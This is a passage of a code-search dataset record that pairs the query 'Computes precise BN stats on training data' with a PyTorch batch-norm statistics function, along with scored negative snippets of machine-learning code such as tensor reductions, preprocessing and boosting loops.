self.batch_size:self.rank * self.batch_size +\n self.batch_size] = tensor\n hvd.allreduce_(total_tensor, average=False) # all-reduce in-place\n return total_tensor", "def _transform_inputs(self, inputs):\n\n if self.input_transform == 'resize_concat':\n inputs = [inputs[i] for i in self.in_index]\n upsampled_inputs = [\n resize(\n input=x,\n size=inputs[0].shape[2:],\n mode='bilinear',\n align_corners=self.align_corners) for x in inputs\n ]\n inputs = torch.cat(upsampled_inputs, dim=1)\n elif self.input_transform == 'multiple_select':\n inputs = [inputs[i] for i in self.in_index]\n else:\n inputs = inputs[self.in_index]\n\n return inputs", "def apply(self, event: Event, state: State, logger: Optional[Logger] = None) -> None:\n input, target = state.batch_pair\n assert isinstance(input, Tensor) and isinstance(target, Tensor), \\\n \"Multiple tensors not supported for this method yet.\"\n\n # Calculate the current size of the inputs to use\n initial_size = self.hparams.initial_scale\n finetune_fraction = self.hparams.finetune_fraction\n scale_frac_elapsed = min([(state.epoch / state.max_epochs) / (1 - finetune_fraction), 1])\n\n # Linearly increase to full size at the start of the fine tuning period\n scale_factor = initial_size + (1 - initial_size) * scale_frac_elapsed\n\n new_input, new_target = resize_inputs(X=input,\n y=target,\n scale_factor=scale_factor,\n mode=self.hparams.mode,\n resize_targets=self.hparams.resize_targets)\n state.batch = (new_input, new_target)", "def aggregate(all_metrics, reducer, suffix):\n # Collect metric separately\n separated_metrics = {} # type: dict[frozenset, list[dict]]\n for el in all_metrics:\n key = frozenset(el[\"metric\"][\"dimensions\"].items())\n if key not in separated_metrics:\n separated_metrics[key] = [el]\n else:\n separated_metrics[key].append(el)\n\n # Collect all dimensions\n dims = {}\n for metric_dims in separated_metrics.keys():\n for prop, val in dict(metric_dims).iteritems():\n if prop in dims:\n dims[prop].add(val)\n else:\n dims[prop] = set(val)\n\n # Sort each metric\n for _, metric in separated_metrics.iteritems():\n metric.sort(key=lambda v: v[\"metric\"][\"timestamp\"])\n\n separated_metrics = sorted(separated_metrics.values(), key=len)\n separated_metrics.reverse()\n\n # Compute the new values\n new_values = []\n all_timestamps = map(\n lambda l: map(\n lambda x: x[\"metric\"][\"timestamp\"], l),\n separated_metrics)\n metric_count = len(separated_metrics)\n for index in range(0, len(separated_metrics[0])):\n new_value = reducer[0](\n separated_metrics[0][index][\"metric\"][\"value\"],\n metric_count)\n new_timestamp = separated_metrics[0][index][\"metric\"][\"timestamp\"]\n for metric_index in range(1, metric_count):\n new_value = reducer[1](new_value, helpers.interpolate(\n new_timestamp,\n separated_metrics[metric_index],\n all_timestamps[metric_index]\n ), metric_count)\n new_values.append((new_timestamp, new_value))\n\n # Aggregate the other details:\n metric_name = separated_metrics[0][0][\"metric\"][\"name\"] + suffix\n meta = separated_metrics[0][0][\"meta\"]\n new_metrics = [\n helpers.create_agg_metric(\n metric_name,\n meta,\n dims,\n val[0],\n val[1]\n ) for val in new_values\n ]\n return new_metrics", "def preprocess(\n self,\n images: ImageInput,\n do_resize: bool = None,\n size: Dict[str, int] = None,\n resample: PILImageResampling = None,\n do_normalize: bool = None,\n do_color_quantize: Optional[bool] = None,\n clusters: Optional[Union[List[List[int]], np.ndarray]] = None,\n return_tensors: Optional[Union[str, TensorType]] = None,\n data_format: Optional[Union[str, ChannelDimension]] = ChannelDimension.FIRST,\n input_data_format: Optional[Union[str, ChannelDimension]] = None,\n **kwargs,\n ) -> PIL.Image.Image:\n do_resize = do_resize if do_resize is not None else self.do_resize\n size = size if size is not None else self.size\n size = get_size_dict(size)\n resample = resample if resample is not None else self.resample\n do_normalize = do_normalize if do_normalize is not None else self.do_normalize\n do_color_quantize = do_color_quantize if do_color_quantize is not None else self.do_color_quantize\n clusters = clusters if clusters is not None else self.clusters\n clusters = np.array(clusters)\n\n images = make_list_of_images(images)\n\n if not valid_images(images):\n raise ValueError(\n \"Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, \"\n \"torch.Tensor, tf.Tensor or jax.ndarray.\"\n )\n\n if do_resize and size is None or resample is None:\n raise ValueError(\"Size and resample must be specified if do_resize is True.\")\n\n if do_color_quantize and clusters is None:\n raise ValueError(\"Clusters must be specified if do_color_quantize is True.\")\n\n # All transformations expect numpy arrays.\n images = [to_numpy_array(image) for image in images]\n\n if is_scaled_image(images[0]) and do_normalize:\n logger.warning_once(\n \"It looks like you are trying to rescale already rescaled images. If you wish to do this, \"\n \"make sure to set `do_normalize` to `False` and that pixel values are between [-1, 1].\",\n )\n\n if input_data_format is None:\n # We assume that all images have the same channel dimension format.\n input_data_format = infer_channel_dimension_format(images[0])\n\n if do_resize:\n images = [\n self.resize(image=image, size=size, resample=resample, input_data_format=input_data_format)\n for image in images\n ]\n\n if do_normalize:\n images = [self.normalize(image=image, input_data_format=input_data_format) for image in images]\n\n if do_color_quantize:\n images = [to_channel_dimension_format(image, ChannelDimension.LAST, input_data_format) for image in images]\n # color quantize from (batch_size, height, width, 3) to (batch_size, height, width)\n images = np.array(images)\n images = color_quantize(images, clusters).reshape(images.shape[:-1])\n\n # flatten to (batch_size, height*width)\n batch_size = images.shape[0]\n images = images.reshape(batch_size, -1)\n\n # We need to convert back to a list of images to keep consistent behaviour across processors.\n images = list(images)\n else:\n images = [\n to_channel_dimension_format(image, data_format, input_channel_dim=input_data_format)\n for image in images\n ]\n\n data = {\"input_ids\": images}\n return BatchFeature(data=data, tensor_type=return_tensors)", "def force_rescale(self,rescaleFactor):\n if not self.built:\n raise Exception(\"model should be built before calling this function\")\n for l in self.layerList:\n l.rescale(rescaleFactor)\n self.rescaleFactor.assign(rescaleFactor)", "def map_flat_values(op, *args, **kwargs):\n # Replace RaggedTensors with their values; and collect the partitions tensors\n # from each RaggedTensor.\n partition_lists = []\n flat_values_nrows = []\n inner_args = _replace_ragged_with_flat_values(args, partition_lists,\n flat_values_nrows)\n inner_kwargs = _replace_ragged_with_flat_values(kwargs, partition_lists,\n flat_values_nrows)\n if not partition_lists:\n return op(*args, **kwargs)\n\n # If we can statically determine that the inputs are incompatible, then raise\n # an error. (We can't guarantee full compatibility statically, so we need to\n # perform some runtime checks too; but this allows us to fail sooner in some\n # cases.)\n if flat_values_nrows:\n flat_values_nrows = set(flat_values_nrows)\n if len(flat_values_nrows) != 1:\n raise ValueError(\"Input RaggedTensors' flat_values must all have the \"\n \"same outer-dimension size. Got sizes: %s\" %\n flat_values_nrows)\n flat_values_nrows = flat_values_nrows.pop() # Get the single element\n else:\n flat_values_nrows = None\n\n partition_dtypes = set(p[0].dtype for p in partition_lists)\n if len(partition_dtypes) > 1:\n if not ragged_config.auto_cast_partition_dtype():\n raise ValueError(\"Input RaggedTensors have mismatched row partition \"\n \"dtypes; use RaggedTensor.with_row_splits_dtype() to \"\n \"convert them to compatible dtypes.\")\n\n partition_lists = [\n [p.with_dtype(dtypes.int64)\n for p in partition_list] # pylint: disable=g-complex-comprehension\n for partition_list in partition_lists\n ]\n\n # Delegate to `op`\n op_output = op(*inner_args, **inner_kwargs)\n # Check that the result has the expected shape (if known).\n if flat_values_nrows is not None:\n if not op_output.shape[:1].is_compatible_with([flat_values_nrows]):\n raise ValueError(\n \"tf.ragged.map_flat_values requires that the output of `op` have \"\n \"the same outer-dimension size as flat_values of any ragged \"\n \"inputs. (output shape: %s; expected outer dimension size: %s)\" %\n (op_output.shape, flat_values_nrows))\n # Compose the result from the transformed values and the partitions.\n return ragged_tensor.RaggedTensor._from_nested_row_partitions( # pylint: disable=protected-access\n op_output,\n _merge_partition_lists(partition_lists),\n validate=False)", "def squash(vectors, axis=-1):\n s_squared_norm = K.sum(K.square(vectors), axis, keepdims=True)\n scale = s_squared_norm / (1 + s_squared_norm) / K.sqrt(s_squared_norm + K.epsilon())\n return scale * vectors", "def with_sum_sum_reduction(self):\n return self.with_reduction(lambda x: x.sum())", "def reduce_run():", "def _transform_inputs(self, inputs):\n if not isinstance(inputs, list):\n return inputs\n if self.input_transform == 'resize_concat':\n inputs = [inputs[i] for i in self.in_index]\n upsampled_inputs = [resize(input=x, size=inputs[0].shape[2:], mode='bilinear', align_corners=self.align_corners) for x in inputs]\n inputs = torch.cat(upsampled_inputs, dim=1)\n elif self.input_transform == 'multiple_select':\n inputs = [inputs[i] for i in self.in_index]\n else:\n inputs = inputs[self.in_index]\n return inputs", "def _transform_inputs(self, inputs):\n if not isinstance(inputs, list):\n return inputs\n if self.input_transform == 'resize_concat':\n inputs = [inputs[i] for i in self.in_index]\n upsampled_inputs = [resize(input=x, size=inputs[0].shape[2:], mode='bilinear', align_corners=self.align_corners) for x in inputs]\n inputs = torch.cat(upsampled_inputs, dim=1)\n elif self.input_transform == 'multiple_select':\n inputs = [inputs[i] for i in self.in_index]\n else:\n inputs = inputs[self.in_index]\n return inputs", "def _transform_inputs(self, inputs):\n if not isinstance(inputs, list):\n return inputs\n if self.input_transform == 'resize_concat':\n inputs = [inputs[i] for i in self.in_index]\n upsampled_inputs = [resize(input=x, size=inputs[0].shape[2:], mode='bilinear', align_corners=self.align_corners) for x in inputs]\n inputs = torch.cat(upsampled_inputs, dim=1)\n elif self.input_transform == 'multiple_select':\n inputs = [inputs[i] for i in self.in_index]\n else:\n inputs = inputs[self.in_index]\n return inputs", "def scalar_mul(x, s, pub):\n x_shape = x.shape\n x_flatten = np.flatten(x)\n s_array = np.array([s for _ in range(len(x_flatten))])\n \n res = paillier_gpu.mul_impl(x_flatten, s_array)\n\n return np.reshape(res, x_shape)", "def compute_moments(\n inputs: JTensor,\n padding: JTensor,\n reduce_over_dims: List[int],\n enable_cross_replica_sum_on_tpu: bool = False,\n keepdims: bool = False,\n) -> Tuple[JTensor, JTensor]:\n assert inputs.ndim == padding.ndim\n rank = inputs.ndim\n assert all([0 <= dim < rank for dim in reduce_over_dims])\n mask = 1.0 - padding\n sum_v = jnp.sum(inputs * mask, axis=reduce_over_dims, keepdims=keepdims)\n count_v = jnp.sum(\n jnp.ones_like(inputs) * mask, axis=reduce_over_dims, keepdims=keepdims)\n\n if enable_cross_replica_sum_on_tpu:\n # TODO(shafey, yonghui): Fetch axis_name from globals.\n sum_v = jax.lax.psum(sum_v, axis_name='batch')\n count_v = jax.lax.psum(count_v, axis_name='batch')\n\n count_v = jnp.maximum(count_v, 1.0)\n mean = sum_v / count_v\n sum_vv = jnp.sum(\n (inputs - mean) * (inputs - mean) * mask,\n axis=reduce_over_dims,\n keepdims=keepdims)\n\n if enable_cross_replica_sum_on_tpu:\n # TODO(shafey, yonghui): Fetch axis_name from globals.\n sum_vv = jax.lax.psum(sum_vv, axis_name='batch')\n\n variance = sum_vv / count_v\n return mean, variance", "def scale_vectors(vectors, f):\n return [scale_vector(vector, f) for vector in vectors]", "def _apply(self, x, **kwargs):\n return reduce(lambda x_i, tr: tr._apply(x_i), self.transforms, x)", "def _numeric_combine(x, fn, reduce_instance_dims=True, name=None):\n if not isinstance(x, tf.Tensor):\n raise TypeError('Expected a Tensor, but got %r' % x)\n\n if reduce_instance_dims:\n # If reducing over all dimensions, result is scalar.\n shape = ()\n elif x.shape.dims is not None:\n # If reducing over batch dimensions, with known shape, the result will be\n # the same shape as the input, but without the batch.\n shape = x.shape.as_list()[1:]\n else:\n # If reducing over batch dimensions, with unknown shape, the result will\n # also have unknown shape.\n shape = None\n return combine_analyzer(\n x, x.dtype, shape, _NumPyCombinerSpec(fn, reduce_instance_dims),\n name if name is not None else fn.__name__)", "def fold_all_batch_norms_to_scale(\n sim: QuantizationSimModel,\n) -> List[Tuple[QcQuantizeWrapper, QcQuantizeWrapper]]:\n # pylint: disable=protected-access\n assert sim.model is not None\n assert sim.connected_graph is not None\n\n model = sim.model\n connected_graph = sim.connected_graph\n\n quant_wrappers = {\n quant_wrapper._module_to_wrap: quant_wrapper\n for _, quant_wrapper in sim.quant_wrappers()\n }\n conv_bn_pairs, bn_conv_pairs, _ = _find_all_batch_norms_to_fold(connected_graph)\n conv_bn_pairs = [\n (quant_wrappers[conv], quant_wrappers[bn]) for conv, bn in conv_bn_pairs\n ]\n bn_conv_pairs = [\n (quant_wrappers[bn], quant_wrappers[conv]) for bn, conv in bn_conv_pairs\n ]\n\n _fold_given_batch_norms(model, conv_bn_pairs, bn_conv_pairs)\n\n return conv_bn_pairs + [(conv, bn) for bn, conv in bn_conv_pairs]", "def __normalizeData__(self,tensors = None):\n if(tensors is None):\n tensors = self.__tensors__\n new_tensors=[]\n for tensor in tensors:\n new_tensors.append( [ [1/(1+x) for x in tensor[0] ] , tensor[1],tensor[2],tensor[3] ])\n return new_tensors", "def all(tensor):\n raise NotImplementedError", "def compute_mul(tree):\r\n neg, inputs = tree\r\n if inputs is None:\r\n raise AssertionError(\r\n 'Function `compute_mul` found a missing leaf, did you forget to '\r\n 'call `simplify_mul` on the tree first?')\r\n elif isinstance(inputs, list):\r\n # Recurse through inputs.\r\n rval = tensor.mul(*map(compute_mul, inputs))\r\n else:\r\n rval = inputs\r\n if neg:\r\n rval = -rval\r\n return rval", "def transform_images(img, size):\n return tf.image.resize(img, (size, size)) / 255", "def Reduce(\n self,\n sendbuf: Union[DNDarray, torch.Tensor, Any],\n recvbuf: Union[DNDarray, torch.Tensor, Any],\n op: MPI.Op = MPI.SUM,\n root: int = 0,\n ):\n ret, sbuf, rbuf, buf = self.__reduce_like(self.handle.Reduce, sendbuf, recvbuf, op, root)\n if buf is not None and isinstance(buf, torch.Tensor) and buf.is_cuda and not CUDA_AWARE_MPI:\n buf.copy_(rbuf)\n return ret", "def apply_all_accumulators(self):\n self._require_state(\"APPLYING\")\n for mi in self._accums.keys():\n self._apply_one_accum_set(mi)", "def scale(requestContext, seriesList, factor):\n for series in seriesList:\n series.name = \"scale(%s,%g)\" % (series.name,float(factor))\n series.pathExpression = series.name\n for i,value in enumerate(series):\n series[i] = safeMul(value,factor)\n return seriesList", "def take_optimizer_step(self, overflow_buf):\n if self.allreduce_post_accumulation:\n # manually allreduce gradients after all accumulation steps\n # check for Inf/NaN\n # 1. allocate an uninitialized buffer for flattened gradient\n scaler = _amp_state.loss_scalers[0]\n master_grads = [\n p.grad\n for p in amp.master_params(self.optimizer)\n if p.grad is not None\n ]\n flat_grad_size = sum(p.numel() for p in master_grads)\n allreduce_dtype = \\\n torch.float16 \\\n if self.allreduce_post_accumulation_fp16 \\\n else torch.float32\n flat_raw = torch.empty(\n flat_grad_size,\n device='cuda', dtype=allreduce_dtype)\n # 2. combine unflattening and predivision of unscaled 'raw' gradient\n allreduced_views = apex_C.unflatten(flat_raw, master_grads)\n overflow_buf.zero_()\n amp_C.multi_tensor_scale(\n 65536,\n overflow_buf,\n [master_grads, allreduced_views],\n scaler.loss_scale() /\n (torch.distributed.get_world_size()\n * self.num_accumulation_steps)\n )\n # 3. sum gradient across ranks. Because of the predivision, this averages the gradient\n torch.distributed.all_reduce(flat_raw)\n # 4. combine unscaling and unflattening of allreduced gradient\n overflow_buf.zero_()\n amp_C.multi_tensor_scale(\n 65536,\n overflow_buf,\n [allreduced_views, master_grads],\n 1./scaler.loss_scale()\n )\n # 5. update loss scale\n scaler = _amp_state.loss_scalers[0]\n old_overflow_buf = scaler._overflow_buf\n scaler._overflow_buf = overflow_buf\n had_overflow = scaler.update_scale()\n scaler._overfloat_buf = old_overflow_buf\n # 6. call optimizer step function\n if had_overflow == 0:\n self.optimizer.step()\n self.global_step += 1\n else:\n # Overflow detected, print message and clear gradients\n if self.is_main_process:\n logging.info(\n f\"Rank {torch.distributed.get_rank()} \"\n \":: Gradient overflow. Skipping step, \"\n f\"reducing loss scale to {scaler.loss_scale()}\"\n )\n if _amp_state.opt_properties.master_weights:\n for param in self.optimizer._amp_stash.all_fp32_from_fp16_params:\n param.grad = None\n for param in self.model.parameters():\n param.grad = None\n else:\n self.optimizer.step()\n # NOTE: This basically does: optimizer.zero_grad()\n for param in self.model.parameters():\n param.grad = None\n self.global_step += 1", "def process_sum_square( fids, ndim=2 ):\n\t\n\timg = process( fids, ndim)\n\timg *= np.conj(img) \n\t\n\treturn np.squeeze(np.sqrt( np.sum( np.abs(img), axis=0) ))" ]
[ "0.6388613", "0.60503924", "0.5885183", "0.5827911", "0.5778461", "0.55323684", "0.5511012", "0.5458916", "0.54437757", "0.5417451", "0.5380227", "0.5299009", "0.5289442", "0.52552223", "0.52131027", "0.5203694", "0.5203694", "0.5196382", "0.515265", "0.5149693", "0.5122873", "0.51203275", "0.51118934", "0.5109616", "0.5050525", "0.50342965", "0.5028793", "0.5004616", "0.50027287", "0.49855158", "0.4985236", "0.49829802", "0.49790654", "0.4974818", "0.4959414", "0.49566516", "0.49463505", "0.49161056", "0.49125937", "0.49042574", "0.4902869", "0.4899781", "0.48981085", "0.48954192", "0.48935", "0.48927975", "0.48737216", "0.4870325", "0.48667923", "0.48664367", "0.4866092", "0.4856836", "0.4850504", "0.48502418", "0.48476207", "0.48373717", "0.48364425", "0.48342925", "0.48316506", "0.48241806", "0.4816289", "0.4815341", "0.4815341", "0.4815341", "0.47909927", "0.47882506", "0.4779059", "0.4775221", "0.47751704", "0.47711754", "0.47627273", "0.47587645", "0.47514844", "0.47484332", "0.47291458", "0.4722746", "0.47153443", "0.4712209", "0.47071505", "0.4702384", "0.46963832", "0.46963212", "0.46912846", "0.46912846", "0.46912846", "0.4690933", "0.4680334", "0.46789655", "0.4675045", "0.4666198", "0.4662403", "0.46573398", "0.46378502", "0.4631076", "0.46306804", "0.46258628", "0.46258062", "0.46250442", "0.46219945", "0.46184945" ]
0.8066509
0
Computes precise BN stats on training data.
def update_bn_stats( model: nn.Module, loader: DataLoader, num_samples: int = 8192, logger: Optional[Union[logging.Logger, str]] = None) -> None: if is_model_wrapper(model): model = model.module # get dist info rank, world_size = mmengine.dist.get_dist_info() # Compute the number of mini-batches to use, if the size of dataloader is # less than num_iters, use all the samples in dataloader. num_iter = num_samples // (loader.batch_size * world_size) num_iter = min(num_iter, len(loader)) # Retrieve the BN layers bn_layers = [ m for m in model.modules() if m.training and isinstance(m, (_BatchNorm)) ] if len(bn_layers) == 0: print_log('No BN found in model', logger=logger, level=logging.WARNING) return print_log( f'{len(bn_layers)} BN found, run {num_iter} iters...', logger=logger) # Finds all the other norm layers with training=True. other_norm_layers = [ m for m in model.modules() if m.training and isinstance(m, (_InstanceNorm, GroupNorm)) ] if len(other_norm_layers) > 0: print_log( 'IN/GN stats will not be updated in PreciseHook.', logger=logger, level=logging.INFO) # Initialize BN stats storage for computing # mean(mean(batch)) and mean(var(batch)) running_means = [torch.zeros_like(bn.running_mean) for bn in bn_layers] running_vars = [torch.zeros_like(bn.running_var) for bn in bn_layers] # Remember momentum values momentums = [bn.momentum for bn in bn_layers] # Set momentum to 1.0 to compute BN stats that reflect the current batch for bn in bn_layers: bn.momentum = 1.0 # Average the BN stats for each BN layer over the batches if rank == 0: prog_bar = ProgressBar(num_iter) for data in itertools.islice(loader, num_iter): data = model.data_preprocessor(data, False) model(**data) for i, bn in enumerate(bn_layers): running_means[i] += bn.running_mean / num_iter running_vars[i] += bn.running_var / num_iter if rank == 0: prog_bar.update() # Sync BN stats across GPUs (no reduction if 1 GPU used) running_means = scaled_all_reduce(running_means, world_size) running_vars = scaled_all_reduce(running_vars, world_size) # Set BN stats and restore original momentum values for i, bn in enumerate(bn_layers): bn.running_mean = running_means[i] bn.running_var = running_vars[i] bn.momentum = momentums[i]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def compute_precise_bn_stats(model, loader):\n # Compute the number of minibatches to use\n num_iter = min(cfg.BN.NUM_SAMPLES_PRECISE // loader.batch_size, len(loader))\n # Retrieve the BN layers\n bns = [m for m in model.modules() if isinstance(m, torch.nn.BatchNorm2d)]\n # Initialize stats storage\n mus = [torch.zeros_like(bn.running_mean) for bn in bns]\n sqs = [torch.zeros_like(bn.running_var) for bn in bns]\n # Remember momentum values\n moms = [bn.momentum for bn in bns]\n # Disable momentum\n for bn in bns:\n bn.momentum = 1.0\n # Accumulate the stats across the data samples\n for inputs, _labels in itertools.islice(loader, num_iter):\n model(inputs.cuda())\n # Accumulate the stats for each BN layer\n for i, bn in enumerate(bns):\n m, v = bn.running_mean, bn.running_var\n sqs[i] += (v + m * m) / num_iter\n mus[i] += m / num_iter\n # Set the stats and restore momentum values\n for i, bn in enumerate(bns):\n bn.running_var = sqs[i] - mus[i] * mus[i]\n bn.running_mean = mus[i]\n bn.momentum = moms[i]", "def compute_training_stats():\n means, stds = [], []\n data = SUNRGBDTrainDataset(True)\n for i in range(len(data)):\n print(i)\n img, _ = data[i]\n std, mean = t.std_mean(input=img, dim=(1, 2))\n means.append(mean)\n stds.append(std)\n means = t.sum(t.vstack(means), dim=0) / len(means)\n stds = t.sum(t.vstack(stds), dim=0) / len(stds)\n print(means, stds)", "def test_Gaussian_NB_estimators():", "def get_training_stats(mlp, dset, nepochs, batch_size):\n train, val, test = dset\n trainx, trainy = train\n valx, valy = val\n testx, testy = test\n\n idxs = np.arange(len(trainx))\n\n training_losses = []\n training_errors = []\n validation_losses = []\n validation_errors = []\n test_losses = []\n test_errors = []\n training_losses_stats = []\n training_errors_stats = []\n validation_losses_stats = []\n validation_errors_stats = []\n\n np.random.seed(123)\n model = mlp\n model.train()\n\n for e in range(nepochs):\n\n # Per epoch setup ...\n seed = np.random.randint(123)\n np.random.seed(seed)\n np.random.shuffle(trainx)\n np.random.seed(seed)\n np.random.shuffle(trainy)\n\n seed = np.random.randint(123)\n np.random.seed(seed)\n np.random.shuffle(valx)\n np.random.seed(seed)\n np.random.shuffle(valy)\n\n model.train()\n\n for b in range(0, len(trainx), batch_size):\n\n # Train ...\n x_batch = trainx[b:b + batch_size]\n y_batch = trainy[b:b + batch_size]\n\n model.zero_grads()\n preds = model.forward(x_batch)\n model.backward(y_batch)\n loss = model.y_loss_criterion\n model.step()\n\n answers = np.argmax(preds, axis=1)\n labels = np.argmax(y_batch, axis=1)\n error = (answers[answers!=labels]).shape[0] / len(answers)\n\n training_losses_stats.append(loss)\n training_errors_stats.append(error)\n\n for b in range(0, len(valx), batch_size):\n\n # Evaluate/Validate ...\n model.eval()\n\n x_batch = valx[b:b + batch_size]\n y_batch = valy[b:b + batch_size]\n\n model.zero_grads()\n preds = model.forward(x_batch)\n #print(\"preds shape = \", preds.shape, \", y_batch shape = \", y_batch.shape)\n loss = model.criterion(preds, y_batch)\n\n answers = np.argmax(preds, axis=1)\n labels = np.argmax(y_batch, axis=0)\n error = float(len(answers[answers!=labels])) / len(answers)\n\n validation_losses_stats.append(loss)\n validation_errors_stats.append(error) \n\n\n # Accumulate data...\n training_losses.append(np.mean(training_losses_stats))\n training_errors.append(np.mean(training_errors_stats))\n\n validation_losses.append(np.mean(validation_losses_stats))\n validation_errors.append(np.mean(validation_errors_stats))\n \n if val:\n accuracy = model.validate(val) * 100.0\n print(\"Epoch {0}, accuracy {1} %.\".format(e + 1, accuracy))\n model.validation_acc.append(accuracy)\n else:\n print(\"Processed epoch {0}.\".format(e))\n\n\n # Cleanup ...\n model.eval()\n\n seed = np.random.randint(123)\n np.random.seed(seed)\n np.random.shuffle(testx)\n np.random.seed(seed)\n np.random.shuffle(testy) \n\n for b in range(0, len(testx), batch_size):\n\n # Test ...\n x_batch = testx[b:b + batch_size]\n y_batch = testy[b:b + batch_size]\n\n model.zero_grads()\n preds = model.forward(x_batch)\n model.backward(y_batch)\n loss = model.criterion(model.inputs[-1], y_batch)\n\n answers = np.argmax(preds, axis=1)\n labels = np.argmax(y_batch, axis=0)\n error = len(answers[answers!=labels]) / len(answers)\n\n test_losses.append(loss)\n test_errors.append(error)\n\n # Return results ...\n return (training_losses, training_errors, validation_losses, validation_errors)", "def ComputeNrb(self):\r\n pass", "def update_bn_stats(\n model: nn.Module,\n data_loader: Iterable[Any],\n num_iters: int = 200,\n by_epoch: bool = False):\n bn_layers = get_bn_modules(model)\n\n if len(bn_layers) == 0:\n return\n\n momentum_actual = [bn.momentum for bn in bn_layers]\n for bn in bn_layers:\n bn.momentum = 1.0\n\n running_mean = [\n torch.zeros_like(bn.running_mean) for bn in bn_layers\n ]\n running_var = [torch.zeros_like(bn.running_var) for bn in bn_layers]\n\n if by_epoch:\n num_iters = num_iters * len(data_loader)\n\n iter_loader = IterLoader(data_loader)\n ind = -1\n with tqdm(total=num_iters) as pbar:\n pbar.set_description('Calculating running stats')\n while ind < num_iters:\n data_batch = next(iter_loader)\n output = model(data_batch['img'])\n\n ind += 1\n for i, bn in enumerate(bn_layers):\n running_mean[i] += (bn.running_mean - running_mean[i]) / (ind + 1)\n running_var[i] += (bn.running_var - running_var[i]) / (ind + 1)\n\n pbar.update(1)\n\n assert ind == num_iters, (\n \"update_bn_stats is meant to run for {} iterations, \"\n \"but the dataloader stops at {} iterations.\".format(num_iters, ind)\n )\n\n for i, bn in enumerate(bn_layers):\n bn.running_mean = running_mean[i]\n bn.running_var = running_var[i]\n bn.momentum = momentum_actual[i]", "def test_Bernoulli_NB_estimators():", "def test_GNB():\n gnb = GNB()\n n = 10\n nclasses = 2\n nfeatures = 4\n means = (np.tile(10**np.arange(nfeatures), (nclasses, 1))\n * np.arange(1, nclasses+1)[:,None])\n sds = (np.tile(.1**(np.arange(nfeatures)), (nclasses, 1))\n * np.arange(1, nclasses+1)[:, None])\n\n x = np.concatenate(np.random.normal(means, sds, (n // nclasses, *means.shape)))\n y = np.tile(np.arange(nclasses), n // nclasses)\n\n gnb.fit(x, y)\n pred = gnb.predict(x)\n\n print(gnb.means.shape, means.shape)\n print(gnb.sds.shape, sds.shape)\n\n print('comparing mean estimates')\n print('========================')\n print(gnb.means - means)\n print(f'largest difference = {np.max(np.abs(gnb.means - means)):.3f}')\n\n print('\\ncomparing sd estimates')\n print('======================')\n print(gnb.sds - sds)\n print(f'largest difference = {np.max(np.abs(gnb.sds - sds)):.3f}')\n\n print('\\ncomparing predictions')\n print('=====================')\n print(y - pred)\n print(f'largest difference = {np.max(np.abs(pred - y)):.3f}')\n\n\n preds = modeltest(gnb, x, y, x)\n assert np.all(preds == y)", "def run(self):\n if self.pb.xvalEN and not self.isXvalMain:\n dt = np.ones(self.pb.total_exam_no,\n dtype=\"float32\") / self.train_exam_no\n dt[self.val_indices] = 0.0\n else:\n dt = np.ones(self.pb.total_exam_no,\n dtype=\"float32\") / self.pb.total_exam_no\n\n val = np.zeros(8,dtype=\"float32\")-1\n boosting = None\n wl = None\n if self.pb.algorithm == 'conf-rated':\n boosting = ConfidenceRated(self)\n wl = ConfidenceRatedWL(self)\n elif self.pb.algorithm == 'adaboost':\n boosting = AdaBoost(self)\n wl = AdaBoostWL(self)\n elif self.pb.algorithm == 'adaboost-fast':\n boosting = AdaBoostFast(self)\n wl = AdaBoostFastWL(self)\n elif self.pb.algorithm == 'rankboost':\n boosting = RankBoost(self)\n wl = ConfidenceRatedWL(self)\n elif self.pb.algorithm == 'rankboost-fast':\n boosting = RankBoost(self)\n wl = AdaBoostFastWL(self)\n else:\n raise Exception(\"Unknown Boosting Algorithm\")\n \n for r in range(self.pb.rounds):\n tree = wl.run(dt)\n dt = boosting.run(dt = dt,\n r = r,\n tree = tree)\n \n if self.isXvalMain:\n boosting.finalize()\n \n \"\"\"Sync the predictions and save them to a file\"\"\"\n if self.pb.isLeader:\n if self.pb.xvalEN and not self.isXvalMain:\n val_predictions = boosting.get_val_predictions()\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n val_predictions = val_predictions,\n hypotheses = hypotheses,\n )\n if self.pb.testEN and self.isXvalMain:\n train_predictions = boosting.get_train_predictions()\n test_predictions = boosting.get_test_predictions()\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n train_predictions = train_predictions,\n test_predictions = test_predictions,\n hypotheses = hypotheses,\n )\n if not self.pb.testEN and self.isXvalMain:\n train_predictions = boosting.get_train_predictions()\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n train_predictions = train_predictions,\n hypotheses = hypotheses,\n )", "def run(self):\n if self.pb.xvalEN and not self.isXvalMain:\n dt = np.ones(self.pb.total_exam_no,\n dtype=\"float32\") / self.train_exam_no\n dt[self.val_indices] = 0.0\n else:\n dt = np.ones(self.pb.total_exam_no,\n dtype=\"float32\") / self.pb.total_exam_no\n\n val = np.zeros(8,dtype=\"float32\")-1\n boosting = None\n wl = None\n if self.pb.algorithm == 'conf-rated':\n boosting = ConfidenceRated(self)\n wl = ConfidenceRatedWL(self)\n elif self.pb.algorithm == 'adaboost':\n boosting = AdaBoost(self)\n wl = AdaBoostWL(self)\n elif self.pb.algorithm == 'adaboost-fast':\n boosting = AdaBoostFast(self)\n wl = AdaBoostFastWLMPI(self)\n elif self.pb.algorithm == 'rankboost':\n boosting = RankBoost(self)\n wl = ConfidenceRatedWL(self)\n elif self.pb.algorithm == 'rankboost-fast':\n boosting = RankBoost(self)\n wl = AdaBoostFastWL(self)\n else:\n raise Exception(\"Unknown Boosting Algorithm\")\n \n for r in range(self.pb.rounds):\n tree = wl.run(dt)\n dt = boosting.run(dt = dt,\n r = r,\n tree = tree)\n \n if self.isXvalMain:\n boosting.finalize()\n \n \"\"\"Sync the predictions and save them to a file\"\"\"\n if self.pb.isLeader:\n if self.pb.xvalEN and not self.isXvalMain:\n val_predictions = boosting.get_val_predictions()\n hypotheses = boosting.get_hypotheses()\n np.savez(self.out_fp,\n val_predictions = val_predictions,\n hypotheses = hypotheses,\n )\n if self.pb.testEN and self.isXvalMain:\n train_predictions = np.zeros([self.pb.total_exam_no,self.pb.rounds],\n dtype=\"float32\")\n test_predictions = np.zeros([self.pb.test_exam_no,self.pb.rounds],\n dtype=\"float32\")\n for slv in np.arange(self.pb.comm_size):\n tr_i1 = self.pb.train_partition[slv]\n tr_i2 = self.pb.train_partition[slv+1]\n te_i1 = self.pb.test_partition[slv]\n te_i2 = 